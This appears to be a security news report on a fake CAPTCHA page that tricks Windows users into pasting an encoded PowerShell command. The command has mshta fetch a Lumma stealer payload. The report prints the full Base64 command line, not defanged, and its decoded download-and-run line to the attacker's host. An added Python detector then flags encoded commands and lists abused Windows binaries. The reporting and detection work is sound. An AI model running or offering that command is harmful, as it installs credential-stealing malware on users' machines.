Fake CAPTCHA Webpage Tricks Users into Running Malicious Code

Our team has discovered a new threat involving a fake CAPTCHA webpage that tricks users into running a dangerous PowerShell script.

Marco Rizal
Last updated: October 23, 2024 11:51 am
By Marco Rizal - Editor, Journalist 5 Min Read

The Hackerdose team discovered a cybersecurity threat that takes advantage of users' trust in CAPTCHA verification processes.

A fake CAPTCHA webpage, antibotx.b-cdn[.]net/captcha-verify.html, tricks users into running a malicious PowerShell script that downloads and executes malware.

The attack exploits users' familiarity with the popular “I'm not a robot” CAPTCHA, leading them to compromise their own systems by running a malicious command.

The method is particularly insidious because it needs nothing more than user interaction and built-in Windows features.

As the command is executed directly through the user's operating system, traditional antivirus programs have a more difficult time detecting the malicious behavior.

How it works

The attack begins when a user visits an unsafe website, most likely one that carries unsafe third-party advertisements.

These advertisements may redirect users to a malicious CAPTCHA page. The fake CAPTCHA looks legitimate and includes an “I'm not a robot” button, which is common on many websites that require human verification.

[Figure 1.1: Fake CAPTCHA webpage]

However, by clicking this button, the webpage secretly copies a PowerShell command to the user's clipboard.

The next stage of the attack begins when the fake CAPTCHA prompts the user to open the Run command by pressing Windows + R.

[Figure 1.2: Verification steps that appear after clicking the button]

The user is then instructed to paste the clipboard content (which has already been replaced by the malicious command) and hit Enter.

This action triggers the execution of a PowerShell command, which eventually downloads and runs a malicious file called trans08.exe.

[Figure 1.3: Command executed via Run]

The command copied to the user's clipboard invokes PowerShell with -eC (short for -EncodedCommand) and a Base64-encoded string that hides the malicious instruction.

powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADAAOAAiAA==

The command looks harmless to a casual reader because the payload is encoded in Base64, an encoding that represents binary data as printable text for easier transmission. It is not encryption: PowerShell's -EncodedCommand simply expects the Base64 form of the script's UTF-16LE bytes, which is why the string is so much longer than the command it hides.

The Base64-encoded string hides the following real command:

mshta "https://clicktogo[.]click/downloads/tra08"

The mshta utility is a legitimate Windows binary used to run Microsoft HTML Applications (HTA), but in this case it is abused to fetch a remote payload and download malware.

The downloaded file is a Trojan horse, which allows attackers to take control of the infected machine or steal sensitive data from the user's system.

Once downloaded, the trans08.exe file behaves like a Trojan horse, attempting to connect to its command-and-control (C2) server and carry out additional malicious actions.
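As an added example (not code from the article or from HackerDose), the following Python decodes a -EncodedCommand payload the way it would appear in process-creation telemetry and flags the pattern described above: an encoded command launched from the Run dialog that hands a remote URL to mshta. The log events are constructed, the Base64 string is the one quoted in the article, and the field names follow Sysmon Event ID 1 as an assumption.

```python
"""Decode PowerShell -EncodedCommand payloads in process-creation events and flag
the ClickFix pattern from the article: an encoded command launched from the Run
dialog that hands a remote URL to mshta. Added example, not HackerDose tooling;
the events are constructed and the Base64 string is the one quoted above."""
import base64

LOLBINS = {"mshta", "rundll32", "regsvr32", "certutil", "bitsadmin", "curl"}

def is_encoded_flag(tok: str) -> bool:
    """PowerShell accepts -e, -ec and any unambiguous prefix of -EncodedCommand."""
    t = tok.lstrip("-/").lower()
    return t in ("e", "ec") or (len(t) >= 3 and "encodedcommand".startswith(t))

def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if there is none.
    The flag takes Base64 over the UTF-16LE bytes of the script."""
    tokens = cmdline.split()
    for flag, payload in zip(tokens, tokens[1:]):
        if is_encoded_flag(flag):
            try:
                return base64.b64decode(payload, validate=True).decode("utf-16-le")
            except ValueError:  # malformed Base64 or invalid UTF-16
                return None
    return None

def classify(event: dict) -> list:
    """event carries 'parent' (image path) and 'cmdline', as in Sysmon Event ID 1."""
    hits = []
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is None:
        return hits
    hits.append("encoded_command")
    # Commands typed into Win+R are spawned by the shell, so the parent is explorer.exe.
    if event["parent"].lower().endswith("\\explorer.exe"):
        hits.append("launched_from_run_dialog")
    words = decoded.split()
    first = words[0].lower().removesuffix(".exe") if words else ""
    if first in LOLBINS:
        hits.append("lolbin:" + first)
    if "http://" in decoded.lower() or "https://" in decoded.lower():
        hits.append("remote_url")
    return hits

# Constructed sample events; the first reproduces the command line from the article.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADAAOAAiAA=="},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]
```

Running classify over real Sysmon or Security 4688 events gives a cheap first-pass rule; the decoded script, not the Base64 blob, is what belongs in the alert.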

[Figure 1.4: Malicious Tra08 program connecting to C2]

The malicious software also uses a deceptive trick: its file metadata lists Microsoft Corporation as the developer name.

During analysis, it was also found that the malware can detect whether it is running in a controlled environment, such as a malware sandbox or a virtual machine.

If such an environment is detected, the malware refuses to execute or to connect to its server, thereby avoiding analysis by security researchers.

In addition, the executable does not appear to be compatible with older versions of Windows.

It does not run on Windows 7 or earlier, returning an error stating that the application is not a valid Win32 application.

[Figure 1.5: File unable to run on Windows 7 (Any.Run)]

This suggests that the malware is targeting more modern systems, which could increase its effectiveness on unpatched or less secure newer Windows versions.

Update: We confirmed, along with other sources, that the threat dropped by the malicious code is a Lumma stealer variant, a malicious infostealer malware written in C.

Comparison to other CAPTCHA scams

This new type of attack differs significantly from the more common CAPTCHA-related scams.

Fake CAPTCHA pages are commonly used to trick users into accepting unwanted browser push notifications, which then bombard their systems with advertisements or phishing links.

However, this scam goes a step further by tricking users into running a PowerShell command that downloads and installs malware on their computers.

The use of PowerShell and clipboard manipulation in this attack exemplifies a more sophisticated technique that heavily relies on social engineering.

Unlike traditional malware distribution methods such as email attachments or drive-by downloads, this approach requires active user participation, making automated detection more difficult.

For readers who may have run the malicious code on their systems, we have published step-by-step instructions for removing the malware.

© 2025 | HackerDose Media Company – All Rights Reserved